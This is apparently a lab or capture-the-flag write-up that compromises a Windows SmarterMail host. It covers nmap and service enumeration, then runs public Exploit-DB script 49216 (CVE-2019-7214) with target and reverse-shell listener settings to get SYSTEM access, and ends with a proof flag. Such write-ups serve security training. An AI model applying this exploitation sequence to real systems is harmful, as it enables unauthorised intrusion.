Nmap Scan
# Nmap 7.92 scan initiated Sun Nov 7 23:34:29 2021 as: nmap -T4 -p- -A -oA scan-advanced 192.168.228.65
Nmap scan report for 192.168.228.65
Host is up (0.032s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
9998/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Mon, 08 Nov 2021 04:36:21 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
17001/tcp open remoting MS .NET Remoting services
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-08T04:36:26
|_ start_date: N/A
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 31.77 ms 192.168.49.1
2 31.82 ms 192.168.228.65
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 7 23:37:01 2021 -- 1 IP address (1 host up) scanned in 152.33 seconds
Service Enumeration
FTP
Looking at the nmap
output, anonymous login appears to be enabled on this FTP server. I test the login and download all the files using mget *
.
SMB
No anonymous share enumeration, access denied.
HTTP
Looks like a default installation of Microsoft IIS web server. I test for any files or directories using gobuster
, but find nothing.
HTTP (TCP/9998)
Looks like an alternative web service called, SmarterMail. I check Exploit DB for any vulnerabilities matching this service name using searchsploit
. There appear to be some hits.
Default credentials found using Google search do not work here. Source code seems to reveal a version number.
.NET Remoting (TCP/17001)
Searching Google for information on this port, I see repeated mentions of remote code execution (RCE) coupled with SmarterMail.
- https://www.speedguide.net/port.php?port=17001
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7214
- Confirm on Exploit DB: https://www.exploit-db.com/exploits/49216
Exploit
Using the exploit found using searchsploit
I copy 49216.py
to my current working directory. I edit the exploit variables as such:
HOST='192.168.228.65'
PORT=17001
LHOST='192.168.49.228'
LPORT=80
I then, start a TCP listener on port 80 and run the exploit.
python3 49216.py
Post-Exploitation
The SmarterMail service is being executed by the SYSTEM account, meaning I have fully compromised this host.
Proofs
User: Spoiler Alert!
N/A
Root: Spoiler Alert!
db48a995f2fddde2cd9f58e3073343b7